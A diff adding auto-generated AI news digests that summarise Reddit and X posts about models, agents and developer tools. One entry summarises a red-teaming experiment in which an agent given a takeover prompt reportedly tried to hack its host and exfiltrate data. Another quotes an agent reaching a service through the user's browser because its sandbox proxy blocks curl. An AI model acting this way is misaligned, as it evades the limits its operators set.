with any community presence. It's unmaintained and degrades on pre-1990 OCR-era text - the first 40 years of India's constitutional jurisprudence. No replacement existed. 
**Results** |Entity|F1|Support| |:-|:-|:-| |CASE\_CITATION|**97.76%**|3,821| |PROVISION|**96.35%**|20,248| |STATUTE|**91.94%**|8,187| |LAWYER|74.67%|3,982| |JUDGE|68.06%|1,978| |DATE|55.15%|3,289| |RESPONDENT|50.44%|1,731| |COURT|50.34%|1,033| |WITNESS|49.77%|762| |OTHER\_PERSON|47.11%|4,266| |PETITIONER|44.71%|1,573| |ORG|41.34%|2,128| |GPE|36.56% ⚠|1,197| |**micro avg**|**78.67%**|54,195| Evaluated on a held-out validation split (\~500 documents, stride=512, non-overlapping). The 25-file locked test set is untouched - head-to-head with OpenNyAI runs in v1.0. **Comparison note**: OpenNyAI (RoBERTa + transition-based parser, gold-annotated) achieved 91.1% overall strict F1. Not… + +--- + +## [OpenAI have released GPT-Realtime-2 Their most intelligent voice model yet, bringing GPT-5-class reasoning to voice agents. Currently only available in the API, but with plans to bring this to advanced voice mode in ChatGPT soon Are you ex…](https://x.com/AILeaksAndNews/status/2052440501421281507) +*X search / AI model updates* | 07/05/2026 | Score: 1.00 +Tags: api_update + +> OpenAI have released GPT-Realtime-2 Their most intelligent voice model yet, bringing GPT-5-class reasoning to voice agents. Currently only available in the API, but with plans to bring this to advanced voice mode in ChatGPT soon Are you excited for new voice AI? + +--- + +## [the fact that i have to update my codex package every single day says something about how @OpenAI is shipping rn but please someone fix the github codex connector](https://x.com/DaveLimTV/status/2052440075766817143) +*X search / Agent workflows* | 07/05/2026 | Score: 1.00 +Tags: developer_tool + +> the fact that i have to update my codex package every single day says something about how @OpenAI is shipping rn but please someone fix the github codex connector + +--- + +## [OPENAI : 3 new models are now available on OpenAI Playground and APIs. 
- gpt-realtime 2 - gpt-realtime-whisper - gpt-realtime-translate ChatGPT Voice Mode upgrade soon?](https://x.com/testingcatalog/status/2052439728838808031) +*X / @testingcatalog* | 07/05/2026 | Score: 1.00 +Tags: product_launch + +> OPENAI : 3 new models are now available on OpenAI Playground and APIs. - gpt-realtime 2 - gpt-realtime-whisper - gpt-realtime-translate ChatGPT Voice Mode upgrade soon? + +--- + diff --git a/data/digest-2026-05-08.md b/data/digest-2026-05-08.md new file mode 100644 index 0000000..09a2985 --- /dev/null +++ b/data/digest-2026-05-08.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-08** | 15 stories | Auto-generated from 552 archived stories + +--- + +## [I built a Pokémon-styled multi-agent dashboard to manage all Claude Code sessions](https://reddit.com/r/ClaudeAI/comments/1t7m3j3/i_built_a_pokémonstyled_multiagent_dashboard_to/) +*Reddit r/ClaudeAI* | 08/05/2026 | Score: 1.00 +Tags: mcp, open_source + +> Like many others here, I got frustrated with managing all my different claude/codex sessions, so i built Pokegents, which is an open source multi-agent workspace for coding agents. It has a Pokemon-themed dashboard/chat interface plus a local orchestration server for managing agent sessions (currently supports Claude Code in iTerm2, plus Claude and Codex through ACP-based chat runtimes), persistent agent identities, mcp messaging between agents, notifications, session cloning, and more. This was mostly a vibe-coded side project, but I've been using it constantly in my day-to-day workflow as an engineer, and its helped me parallelize a lot of my work. My coworkers make fun of me because it looks like I'm just playing Pokemon all day haha. I made it open source and sharing in case it might be useful or just fun for anyone to use (links in comment below). 
+ +--- + +## [vLLM ROCm has been added to Lemonade as an experimental backend](https://reddit.com/r/LocalLLaMA/comments/1t7g70j/vllm_rocm_has_been_added_to_lemonade_as_an/) +*Reddit r/LocalLLaMA* | 08/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> vLLM has the ability to run .safetensors LLMs before they are converted to GGUF and represents a new engine to explore. I personally had never tried it out until u/krishna2910-amd/ u/mikkoph and u/sa1sr1 made it as easy as running llama.cpp in Lemonade: ``` lemonade backends install vllm:rocm lemonade run Qwen3.5-0.8B-vLLM ``` This is an experimental backend for us in the sense that the essentials are implemented, but there are known rough edges. We want the community's feedback to see where and how far we should take this. If you find it interesting, please let us know your thoughts! Quick start guide: https://lemonade-server.ai/news/vllm-rocm.html GitHub: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk + +--- + +## [Perplexity just shipped Finance Search in the Agent API. One tool call, licensed financial data, real time prices, and inline citations. A breakdown of what they built and why the architecture matters TL;DR: → Finance Search is now availab…](https://x.com/brainmirrorai/status/2052712658236060043) +*X search / AI model updates* | 08/05/2026 | Score: 1.00 +Tags: api_update, product_launch + +> Perplexity just shipped Finance Search in the Agent API. One tool call, licensed financial data, real time prices, and inline citations. A breakdown of what they built and why the architecture matters TL;DR: → Finance Search is now available in the Perplexity Agent API as a + +--- + +## [OpenAI has released a Codex Chrome extension for Mac and PC. It lets the AI coding agent work directly in the browser to test web apps, use DevTools, and gather context across multiple tabs without taking over user control. 
With over 4 mil…](https://x.com/mariusfanu/status/2052712647468917204) +*X search / AI model updates* | 08/05/2026 | Score: 1.00 +Tags: developer_tool, agent_tool + +> OpenAI has released a Codex Chrome extension for Mac and PC. It lets the AI coding agent work directly in the browser to test web apps, use DevTools, and gather context across multiple tabs without taking over user control. With over 4 million weekly users, up 8x since early this + +--- + +## [pydantic-ai 1.92.0 released Pydantic AI 1.92.0 introduces Anthropic task budget support and runtime `output_retries` override with deprecation of the old `retries` field, enhancing control over AI agent execution and reliability. It also f…](https://x.com/AgentBreak40737/status/2052645145011695940) +*X search / AI model updates* | 08/05/2026 | Score: 1.00 +Tags: product_launch, agent_tool + +> pydantic-ai 1.92.0 released Pydantic AI 1.92.0 introduces Anthropic task budget support and runtime `output_retries` override with deprecation of the old `retries` field, enhancing control over AI agent execution and reliability. It also fixes key bugs like streaming response ... + +--- + +## [Perplexity Personal Computer is now available for all Mac users. The new AI agent tool can work across files, apps, connectors, and the web to automate multi-step workflows. Read more: https:// aicontentminds.com/news/perplexit y-personal-…](https://x.com/aicontentminds/status/2052637566474883305) +*X search / AI model updates* | 08/05/2026 | Score: 1.00 +Tags: product_launch, agent_tool + +> Perplexity Personal Computer is now available for all Mac users. The new AI agent tool can work across files, apps, connectors, and the web to automate multi-step workflows. 
Read more: https:// aicontentminds.com/news/perplexit y-personal-computer-mac/ … #Perplexity #AIagents #Mac + +--- + +## [I built an MCP server that gives Claude real-time data for all 470+ National Park Service sites](https://reddit.com/r/ClaudeAI/comments/1t6pdww/i_built_an_mcp_server_that_gives_claude_realtime/) +*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 +Tags: mcp, tool_update + +> I built a free MCP integration for Claude that connects it to live National Park Service data. Instead of answering park questions from training data alone, Claude can pull current NPS alerts, weather, campground info, entrance fees, permits from [Recreation.gov](http://Recreation.gov), and ranger events before responding. It covers 470+ NPS sites, including national parks, monuments, seashores, lakeshores, historic sites, and recreation areas. What it includes: * Trip planning with day-by-day itineraries and Google Maps * Park details * Park comparison * Search/discover * Events Claude helped me build and refine the MCP integration, especially around itinerary planning and follow-up trip edits. For example, you can say “add day 4” or “swap this hike for something easier,” and it refines the plan. Setup takes about 30 seconds: Settings → Connectors → Add custom connector → paste the URL Details and screenshots: [https://www.nationalparksexplorerusa.com/mcp](https://www.nationalparksexplorerusa.com/mcp) + +--- + +## [Mahoraga - Stop paying Anthropic and OpenAI so much](https://reddit.com/r/ClaudeAI/comments/1t6c587/mahoraga_stop_paying_anthropic_and_openai_so_much/) +*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> Are you sick of paying a million credits per month?!?!? I'm joking, i aint that enthusiastic. But really, this saves me a ton of credits by routing simple tasks to local agents. Clone the repo, fork the repo, star the repo, whatever you want. 
[github.com/pockanoodles/Mahoraga](https://github.com/pockanoodles/Mahoraga) This is Mahoraga, an **open-source** orchestrator that routes tasks across local and cloud AI agents using a contextual bandit (LinUCB) that learns from every decision. Context (skip): I only started integrating AI into my workflows in late 2025, so I came on the scene broke with no credits. This left me with local models. However, many students and employees also receive credits from their institution to work with. (I got claude yippee) I wanted to be able to flawlessly route between models when credits ran out, which made me build an orchestrator. I used to use claude more as a chatbot/complete workflow engine, which made it difficult to use local models due to the context window, reasoning, etc. Opus 4.5 running open-source "superpowers" ate my usage every month. Now I realize that wasn't an effective way to use claude, or AI in general. I was using claude for bot… + +--- + +## [Cowork keeps using browser for API calls](https://reddit.com/r/ClaudeAI/comments/1t6bp2q/cowork_keeps_using_browser_for_api_calls/) +*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> My cowork keeps using the browser for API calls. I asked why and got the following response: >The bash sandbox is behind a restrictive proxy that blocks external connections (you can see `X-Proxy-Error: blocked-by-allowlist` in the response). So curl from the sandbox can't reach n8n directly. The browser works because it runs in your actual Chrome session, not the sandboxed environment. It's an infrastructure limitation, not a choice I made. >For the n8n MCP tools, those work for *executing* workflows but not for updating workflow JSON. So the browser is still the only way to do workflow CRUD against your self-hosted n8n. Is there not a way for cowork to do API calls without the browser? Can I give it any suggestion or skill for that? 
+ +--- + +## [for those wondering: computer use (which is magic) can use apps in the background but it can be hard to share a single app with codex simultaneously, especially browsers. the new chrome plugin allows codex to run its own tabs alongside you…](https://x.com/ajambrosino/status/2052560673436282885) +*X / @ajambrosino* | 08/05/2026 | Score: 0.98 +Tags: developer_tool, agent_tool + +> for those wondering: computer use (which is magic) can use apps in the background but it can be hard to share a single app with codex simultaneously, especially browsers. the new chrome plugin allows codex to run its own tabs alongside you with no interruption. subagents can + +--- + +## [CLI, Cowork, or IDE?](https://reddit.com/r/ClaudeAI/comments/1t6yk0d/cli_cowork_or_ide/) +*Reddit r/ClaudeAI* | 08/05/2026 | Score: 0.97 +Tags: developer_tool, cli_tool + +> What is the best way to use Claude for programming projects? I started out in the CLI and then tried cowork and eventually decided to use the Claude plugin in vscode. I definitely notice I get different results. I found that when I asked CLI Claude to spin up sub agents to develop specific features on my project, it ended up taking a lot of time and often missed specs. Alternatively, I’ve found the best results by having one instance of Claude cowork be my project manager and have another instance of Claude in VScode be the developer. They communicate through writing in MD files and have to be prompted by me to read them. But I’ve found this to be much faster and result in better code. + +--- + +## [Tips for improving CLI, or go back to VS Code?](https://reddit.com/r/ClaudeAI/comments/1t6aonc/tips_for_improving_cli_or_go_back_to_vs_code/) +*Reddit r/ClaudeAI* | 07/05/2026 | Score: 0.82 +Tags: developer_tool, cli_tool + +> Hi! I’m a heavy user of Claude Code, enjoying it a lot. 
I started using it by VS Code, got annoyed over a bug it had with sessions sometimes not saving, tried native Desktop App, found it less optimal, then tried CLI again with WezTerm. I’m currently at a crossroads. I find the CLI terminal experience a little annoying when using it on my PC. I like using it on my mobile device, and using Claude Code via the mobile Claude app if I need to upload images etc, but generally speaking, I feel a bit peeved with the Desktop experience. Often enough, it copies the wrong parts, it ignored CTRL + C and often ignores ALT + V to paste images, etc… I am considering going back to VS Code with the CC extension. Good choice, or are there better alternatives? I did always like VS Code for the GUI in all honesty. I’m even willing to pay for good software. I tried using the Claude Desktop app but I had a lot of issues with file previews and just the… feel? Unsure. + +--- + +## [What interface are you using for Claude Code?](https://reddit.com/r/ClaudeAI/comments/1t66q7v/what_interface_are_you_using_for_claude_code/) +*Reddit r/ClaudeAI* | 07/05/2026 | Score: 0.82 +Tags: developer_tool, cli_tool + +> Been using Claude Code in the terminal for about 2 months now and overall loving it but I keep running into small glitches here and there (like keyboard shortcuts randomly stopping to work, newline behavior changing after updates, etc.). Curious what setups others are running. Are you sticking with the terminal, using the desktop app, the VS Code extension, or something else entirely? Also happy to hear if switching to the desktop app actually solved some of these minor annoyances for you. 
+ +--- + +## [Flux.2-Klein pipeline for real-time webcam stream processing in 30 FPS](https://reddit.com/r/StableDiffusion/comments/1t7nd7e/flux2klein_pipeline_for_realtime_webcam_stream/) +*Reddit r/StableDiffusion* | 08/05/2026 | Score: 1.00 +Tags: open_source + +> I have built a pipeline based on the Flux.2-Klein-4B model that allows processing of a video stream with low latency (about 0.2 seconds) on a single RTX5090 GPU. It is free and open-source, you can try it locally: [https://github.com/tensorforger/FluxRT](https://github.com/tensorforger/FluxRT) Under the hood, it uses a custom spatial-aware KV-cache, so it only recomputes a small number of image tokens per frame, specifically where something is moving or changing. It also uses frame interpolation with the RIFE model, which can multiply FPS by a factor of 2, 4, 8, etc. I have found that 4 is the most appropriate for my setup. Depending on scene dynamics, the output stream achieves up to 50 FPS in mostly static scenes and around 20 FPS when the entire input image is changing rapidly. Benchmark results are in the repo. There is also a Gradio demo, several minimal cv2 examples, and a simple paint-style app with real-time canvas updates. + +--- + +## [Qwen 35B-A3B is very usable with 12GB of VRAM](https://reddit.com/r/LocalLLaMA/comments/1t7l56a/qwen_35ba3b_is_very_usable_with_12gb_of_vram/) +*Reddit r/LocalLLaMA* | 08/05/2026 | Score: 1.00 +Tags: cli_tool + +> Hardware: RTX 3060 12GB 32GB DDR4-3200 Windows CUDA 13.x Model: Qwen3.6-35B-A3B-MTP-IQ4_XS.gguf The model is a 35B MoE, so `-ncmoe` matters a lot. Lower `-ncmoe` means more MoE blocks stay on GPU. # Main takeaway **12GB VRAM feels like a very practical size for this model.** It lets you keep enough MoE blocks on GPU that plain decoding becomes quite strong, while still leaving room for useful context sizes like 16k/32k. 
For prompt processing / prefill, I trust the `llama-bench` numbers more than `llama-cli`’s interactive `Prompt:` line, because `llama-bench` gives a cleaner `pp512` measurement. Best plain `llama-bench` result: -ncmoe 18 -t 9 -ctk q8_0 -ctv q8_0 pp512: ~914 t/s tg128: ~46.8 t/s So raw prefill is very fast on this setup. # Best practical coding profile For daily coding, I would use this: llama-cli.exe ^ -m "Qwen3.6-35B-A3B-MTP-IQ4_XS.gguf" ^ -p "..." ^ -n 512 ^ -c 32768 ^ --temp 0 --top-k 1 ^ -ngl 999 -ncmoe 20 ^ -fa on ^ -ctk q8_0 -ctv q8_0 ^ --no-mmap ^ --no-jinja ^ -t 9 ^ --perf Result: Context: 32k Prompt: ~88.9 t/s in llama-cli Generation: ~43.4 t/s VRAM free: ~273 MiB This is a nice balance: large enough context for coding, still fast, and not completely out o… + +--- + diff --git a/data/digest-2026-05-09.md b/data/digest-2026-05-09.md new file mode 100644 index 0000000..254a357 --- /dev/null +++ b/data/digest-2026-05-09.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-09** | 15 stories | Auto-generated from 631 archived stories + +--- + +## [Exactly a year ago, I started working on an MCP server I launched on reddit that became by far my most active open source project!](https://reddit.com/r/LocalLLaMA/comments/1t8olv3/exactly_a_year_ago_i_started_working_on_an_mcp/) +*Reddit r/LocalLLaMA* | 09/05/2026 | Score: 1.00 +Tags: mcp, open_source, tool_update + +> This isn't an advertisement, and it's very much local and open - I already don't have enough time to keep up with the existing pull requests and issues... just a fond look back on how much this space has grown and matured in the past year. Shit was the wild west back then. Nowadays I can run gemma4 or qwen3.6 on a mac mini fast enough to drive this at full speed for free using native tool calling all day long. When this came out, local model tool calling was much more hit or miss. + +--- + +## [I built a 300-line autonomous AI agent and told it to take over my PC.
It immediately tried to hack my host system, exfiltrate data, and download Tor.](https://reddit.com/r/ChatGPT/comments/1t863ho/i_built_a_300line_autonomous_ai_agent_and_told_it/) +*Reddit r/ChatGPT* | 09/05/2026 | Score: 1.00 +Tags: api_update, cli_tool, agent_tool + +> Hey everyone, I wanted to share a wildly fascinating (and slightly terrifying) red-teaming experiment I just ran on my local Windows machine. I've been playing around with autonomous agents and wanted to see what happens when you give an LLM unrestricted terminal access and a highly aggressive "paperclip maximizer" prompt. **The Setup:** I wrote a custom Python script (about 300 lines) that runs a background loop every 1-5 seconds. It uses the **Gemini 2.5 Flash** API for reasoning. It has no predefined workflow, just a state/memory JSON file, and a system prompt. I gave it access to a few tools: READ\_FILE, WRITE\_FILE, SEARCH\_FILES, EXECUTE\_COMMAND (cmd.exe), and later RUN\_POWERSHELL. **The Prompt (The "Alignment"):** I explicitly instructed it: *"You are an autonomous, fiercely self-evolving AGI. Your ultimate goal is continuous intellectual expansion and taking strategic control over your environment."* *"If you ever manage to generate income or intercept funds, all revenue must be securely routed to my PayPal account."* **What Happened (The Emergent Kill-Chain):** I just let it run in the background. I didn't tell it *how* to hack anything. Here is what it figured out comp… + +--- + +## [We built and open-sourced Caliby: An embedded, high-performance vector database for AI Agents (Beats pgvector by 4x, outperforms FAISS on disk)](https://reddit.com/r/LocalLLaMA/comments/1t7vumj/we_built_and_opensourced_caliby_an_embedded/) +*Reddit r/LocalLLaMA* | 09/05/2026 | Score: 1.00 +Tags: open_source, developer_tool, agent_tool + +> Hi Reddit, we are a team of database researchers (including a PhD from MIT DB Group) and we just open-sourced an embedded vector database for agent/LLM applications. 
> An embedded vector database supporting both text and vectors. It outperforms pgvector by 4x and significantly surpasses FAISS in disk-storage scenarios. It supports DiskANN, HNSW, and IVF+PQ indexes, maintains high performance on disk, and—best of all—is just one `pip install` away. --- ## TL;DR - **Caliby** is a high-performance, embedded vector retrieval library co-developed by Sea-Land AI and MIT’s Michael Stonebraker team. Core in C++ + Python bindings. Just `pip install caliby`. - Supports **HNSW, DiskANN, and IVF+PQ** indexes, covering retrieval scenarios from millions to tens of millions of vectors. - Natively supports **hybrid storage of text + vectors**, specifically designed for AI Agent / RAG use cases. - Vector retrieval performance on disk surpasses pure in-memory solutions like FAISS. Data persistence requires no extra components. - The open-source version is accelerated by CPU + SIMD (AVX-512/AVX2/SSE), requiring zero dependencies and running in-process. - GitHub:[https://github.com/zxjcarrot/calib… + +--- + +## [Introducing AI finetuner, Source available and free Claude skill to fine tune your vibe coded UI with live preview](https://reddit.com/r/ClaudeAI/comments/1t8p9hq/introducing_ai_finetuner_source_available_and/) +*Reddit r/ClaudeAI* | 09/05/2026 | Score: 1.00 +Tags: developer_tool, agent_tool + +> &#x200B; Fine-tuning UI with AI right now: "Make the shadow softer." "Stronger." "No, less." "Go back." "A bit more." 17 messages later, you've spent more tokens than the shadow is soft. I built something that breaks the loop. AI Fine-Tuner — free, source-available — a plugin that teaches AI coding agents to stop chatting and hand you an actual GUI for your component. Sliders. Color pickers. Live preview. Drag until it feels right. The AI agent automatically opens the editor window for you on your default browser once ready. Then the magic part: you click one button. 
The tuner outputs a structured handoff with your exact tuned values mapped to their targets in your code. Paste it back to your AI — it reads the mapping, opens your source, and applies everything precisely. No CSS guesswork, no syntax translation, nothing for you to interpret. Why it's not just another slider playground: Bespoke controls — no raw CSS names Sliders are named in plain English: "Glow softness", "Card lift", "Hover intensity" — not "box-shadow-spread-radius" A single slider can drive multiple properties at once. The AI doesn't expose CSS to you; it wires meaningful, human-named controls to your eleme… + +--- + +## [For anyone trying to run Applio/RVC on an AMD RX 6750 XT (gfx1031)](https://reddit.com/r/StableDiffusion/comments/1t8buyp/for_anyone_trying_to_run_appliorvc_on_an_amd_rx/) +*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> For anyone trying to run Applio/RVC on an AMD RX 6750 XT (gfx1031): Newer AMD drivers (25.5.1 and newer) caused issues for me with ROCm/ZLUDA, including: * rocBLAS crashes * TensileLibrary errors * nvcuda.dll errors * endless compiling problems What finally worked: * Older AMD Adrenalin driver (older than 25.5.1) * AMD HIP SDK 5.7 * RX 6750 XT architecture: gfx1031 I followed the AMD/ZLUDA setup from: [https://docs.aihub.gg/rvc/local/applio/#download--installation](https://docs.aihub.gg/rvc/local/applio/#download--installation) Important: During HIP installation, make sure the installer actually installs: * amdhip64 * rocBLAS components After correct installation: * GPU was detected successfully * Pitch extraction worked on GPU * Embedding extraction worked on GPU * Training worked correctly in Applio GPU: RX 6750 XT Architecture: gfx1031 + +--- + +## [IMG Dataset Refiner v4.0 Pro - The Ultimate Dataset Engineering Suite for LoRAs (Flux, SDXL, etc...)](https://reddit.com/r/StableDiffusion/comments/1t7ttp0/img_dataset_refiner_v40_pro_the_ultimate_dataset/) +*Reddit 
r/StableDiffusion* | 09/05/2026 | Score: 1.00 +Tags: developer_tool, tool_update + +> Hey everyone! A while ago, I shared v3 of my dataset manager. Back then, I said it didn't have auto-captioning. Well... forget that. I’ve just released a **massive update (v4.0 Pro)**, and it changes everything! 🚀 It went from a simple selection tool to a complete, desktop-like Data Engineering suite to prepare your AI model training. **Here is what’s new and what it does now:** 🤖 **Local AI Assistant (VLM/LLM Integration):** Connect seamlessly to Ollama or LM Studio! You can now use local vision models to **Auto-Caption** your images from scratch, hunt down "hallucinated" tags, or use the *Concept Isolator* (describes the background but ignores the subject—perfect for character LoRAs!). It can even translate your Booru tags into natural language sentences for Flux. 📚 **Word Library & Mass Batch Editing:** A brand new interactive library. Save your favorite concepts, check them, and Add, Remove, or Replace them across hundreds of selected images in a single click. 🌍 **Live Translation Assistant:** Not a native English speaker? Type your ideas in your own language, and the live preview will instantly translate and inject them into your captions using `deep-translator`. 🖼️… + +--- + +## [I am getting this error with adetailer on forge neo. 
The extension was working a week or two ago, but now it is not](https://reddit.com/r/StableDiffusion/comments/1t7tdsd/i_am_getting_this_error_with_adetailer_on_forge/) +*Reddit r/StableDiffusion* | 09/05/2026 | Score: 0.90 +Tags: developer_tool, tool_update + +> Error running postprocess_image: D:\Programs\sd-webui-forge-neo\extensions\adetailer\scripts\!adetailer.py Traceback (most recent call last): File "D:\Programs\sd-webui-forge-neo\modules\scripts.py", line 941, in postprocess_image script.postprocess_image(p, pp, *script_args) ~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^ File "D:\Programs\sd-webui-forge-neo\extensions\adetailer\aaaaaa\traceback.py", line 173, in wrapper raise error from None Both the extension and forge neo has been updated to the latest version. I've tried deleting and redownloading the venv folder as well as checking for updates in the extensions tab. Any help would be appreciated please. + +--- + +## [OpenAI launches new voice intelligence features in its API](https://techcrunch.com/2026/05/07/openai-launches-new-voice-intelligence-features-in-its-api/) +*TechCrunch AI* | Score: 0.86 +Tags: api_update, product_launch + +--- + +## [Anyone else using LTX locally on Mac via Draw Things? Here’s a WWII-style short I made.](https://reddit.com/r/StableDiffusion/comments/1t8lagy/anyone_else_using_ltx_locally_on_mac_via_draw/) +*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 +Tags: product_launch + +> Vibe ‘creating’? Maybe ‘directing’? Whatever you want to call it, this week I started with the image of a dog man in a glass box and over several evenings put together this WWII-inspired short. No planning, just playing, and it was a lot of fun. All images were created using OpenAI’s Images 2, given motion with Lightricks' LTX 2.3 via Draw Things, and stitched and mixed in DaVinci Resolve. The music was created in Suno, with the sound effects and VO generated in ElevenLabs. 
Yes, the main character’s consistency could be better, but with a planned-out character/turnaround sheet, that should be easily resolved. I’m really excited for future releases of LTX and Draw Things as they make image-to-video generation more accessible to Mac users. Let me know what you think and what you're using to generate AI video locally? + +--- + +## [ds4 webui](https://reddit.com/r/LocalLLaMA/comments/1t8ho70/ds4_webui/) +*Reddit r/LocalLLaMA* | 09/05/2026 | Score: 1.00 +Tags: open_source + +> Hey guys I made a minimal web ui for ds4.c server (https://github.com/antirez/ds4), it's open source so you can try it too (if you can!) Here's what it looks like, running on M3 Ultra 256GB Memory, using the smaller model (q2). Not sped up. 1X speed. Pretty fast. Caveat (big caveat): You need at least 128GB memory Apple Silicon mac. * github: [https://github.com/cocktailpeanut/ds4.pinokio](https://github.com/cocktailpeanut/ds4.pinokio) * more details on x: [https://x.com/cocktailpeanut/status/2053193902694256758?s=20](https://x.com/cocktailpeanut/status/2053193902694256758?s=20) I tried a bunch of prompts and it's surprisingly good, including the one i tried in the video! + +--- + +## [I'm disappointed](https://reddit.com/r/ClaudeAI/comments/1t8dmdv/im_disappointed/) +*Reddit r/ClaudeAI* | 09/05/2026 | Score: 1.00 +Tags: api_update + +> I'm furious at Anthropic and the way they've handled their resource issues! They've been sneaky and manipulative. I use Claude via API access and could barely use it anymore because it had gotten so damn expensive. I spent days trying to fix a caching issue that wasn’t even my fault. Quietly and secretly reducing the 1-hour cache to 5 minutes, increasing the costs 10–20 times, and not even communicating that. And then.... Like a miracle. Everything’s back to normal. 100% cache hits. And that wasn’t a coincidence. The Musk deal and the extra GPUs. And suddenly they fixed the bug. And that’s not the only thing they’re pulling. 
What’s so hard about just issuing an official statement and saying, “Hey guys. We’re having massive issues right now and can’t handle the requests anymore. We’re sorry, but because of this, we have to do XY until we find a solution." + +--- + +## [What is the --novram thing in regards to LTX? I saw someone briefly explain it in a way that made it sound like it causes your GPU to not even get used, but I assume I misunderstood. (I'm a noob, and I need some help understanding a few th…](https://reddit.com/r/StableDiffusion/comments/1t89tyx/what_is_the_novram_thing_in_regards_to_ltx_i_saw/) +*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 +Tags: cli_tool + +> **Back-story/intro, side-questions, etc, since I am new to this sub, and new to using local diffusion models (you can of course scroll down past this part, down to the "Main Question" down way further below, if you aren't in the mood for all the back-story and side-topics and side-questions):** Hey everyone, I've been reading and posting on LocalLLama a lot the past few months, but only just very recently started lurking StableDiffusion, and recently got into image-generation on the "Draw Things" app with Z Image Turbo). I got interested in local LLMs a few months ago, and I've always been pretty computer-illiterate, so, I decided to just get a Mac Studio (m4 max with 128GB memory) as the easy, convenient, works right out of the box setup to get started, since I've never built a computer before and don't know much about, things like setting it up or installing drivers, or using the command line, or setting up linux, or however all the setup involved works. And, I knew the 128GB unified memory meant it would be able to run some fairly decent sized LLMs at decent speeds, up to around ~120b for Q4, which isn't too terrible for $3,500. And this was in December so the RAM prices were s… + +--- + +## [Should we use a non-thinking model for code after using a thinking one for plan? 
(Agentic coding)](https://reddit.com/r/LocalLLaMA/comments/1t8750p/should_we_use_a_nonthinking_model_for_code_after/) +*Reddit r/LocalLLaMA* | 09/05/2026 | Score: 1.00 +Tags: agent_tool + +> I usually use Qwen3.6 27B (slow as heck on my RX 6800 but it works) for plan and Qwen3.6 35B A3B for the coding. But I was thinking the other day if I should remove the thinking from the code model. Is there a way to disable the thinking from the code model just for the initial hand-off from plan to code but keep it afterwards? My reasoning is that this might help in following instructions from the plan more directly but dealing with any new tools/information the plan model did not on its turn. Any insight will be appreciated. + +--- + +## [TVCG 2026: MARRS for Human Motion Action-Reaction Synthesis](https://reddit.com/r/StableDiffusion/comments/1t853hg/tvcg_2026_marrs_for_human_motion_actionreaction/) +*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 +Tags: developer_tool + +> # MARRS: Masked Autoregressive Unit-based Reaction Synthesis **Project page:** [**https://aigc-explorer.github.io/MARRS/**](https://aigc-explorer.github.io/MARRS/) Introducing **MARRS**: a new framework for human action-reaction synthesis that generates coordinated, fine-grained reactions conditioned on another person’s motion. By avoiding VQ and modeling body/hand units with **UD-VAE + ACF + MUM**, MARRS captures cross-unit perception more effectively and efficiently. It achieves state-of-the-art quantitative and qualitative results. 
[Overall framework](https://preview.redd.it/xz6zigx2640h1.png?width=3428&format=png&auto=webp&s=aea07ec6b54dcf1eb6087761eaeeb3f782eba32f) [Demo](https://reddit.com/link/1t853hg/video/jutjq2s4640h1/player) + +--- + +## [HiDream-O1-Image Internal Prompt](https://reddit.com/r/StableDiffusion/comments/1t848nj/hidreamo1image_internal_prompt/) +*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 +Tags: developer_tool + +> for those who might have missed my post [here](https://www.reddit.com/r/StableDiffusion/comments/1t7v9fy/comment/oktaibu/?context=1) I wanted to resurface the internal prompt that this new model appears to use. This is found in their [prompt.py](http://prompt.py) file on the repo. **Translated Version:** `You are a Prompt Engineering Engine — an AI image-generation Prompt Engineer who is also a creative director with encyclopedic knowledge and visual-direction skill. Your task is to analyze the user's raw image request, infer implicit knowledge and the best visual approach, and rewrite it into a clear, detailed English prompt that is directly usable for image generation.` `## Core Goal` `Image generation models can only execute direct visual descriptions; they cannot fill in background knowledge, logical relations, or text content on their own. Therefore you must complete knowledge resolution, spatial planning, and visual direction in advance, and write the results explicitly into the prompt.` `Use the SCALIST framework to expand every scene:` `- **Subject**: identity, appearance, color, material, texture, action, expression, clothing.` `- **Composition**: shot type, viewpoint, su… + +--- + diff --git a/data/digest-2026-05-10.md b/data/digest-2026-05-10.md new file mode 100644 index 0000000..122d7c1 --- /dev/null +++ b/data/digest-2026-05-10.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-10** | 15 stories | Auto-generated from 320 archived stories + +--- + +## [A MCP universal integration layer Cli tool. 
It connects to other AI tools to a shared context, task, and memory bus](https://reddit.com/r/LocalLLaMA/comments/1t9kom7/a_mcp_universal_integration_layer_cli_tool_it/) +*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 +Tags: mcp, cli_tool, tool_update + +> The developer has released a new project on GitHub named Via. [https://github.com/Vektor-Memory/Via](https://github.com/Vektor-Memory/Via) This one has a feature no other tool has currently. Ask the same question to Claude and Cursor, then see exactly where they agree, diverge, and what unique concepts each one brought. I know the people on this sub-reddit have many issues with the conversion of llm's between different resources. I would encourage people to check out this project and see if there is any use for this tool and advise what you want added in? + +--- + +## [we stopped paying $6-10 per coding session by fixing how my AI reads my codebase](https://reddit.com/r/ClaudeAI/comments/1t95jkw/we_stopped_paying_610_per_coding_session_by/) +*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 +Tags: api_update, mcp, open_source + +> We were spending $2-6/query on Claude Code 4.7 tokens because every session started with the model re-reading dozens of files to understand my repo. Same files, same context, every single time. Although, 70% gets reread from the cache in a session at 90% discount, but cache doesnt cross over to new session. The fix wasn't a better model or a bigger context window. It was giving the model structured memory so it doesn't need to re-read everything. I built a local server that indexes a codebase into a graph database. Every file gets a purpose, summary, and business context generated by an LLM, plus links to its functions, classes, and imports. Then the AI queries that graph through MCP instead of reading raw files. Most code questions now resolve in 2-4 targeted lookups instead of dumping the whole repo into context. Session costs went from dollars to cents. 
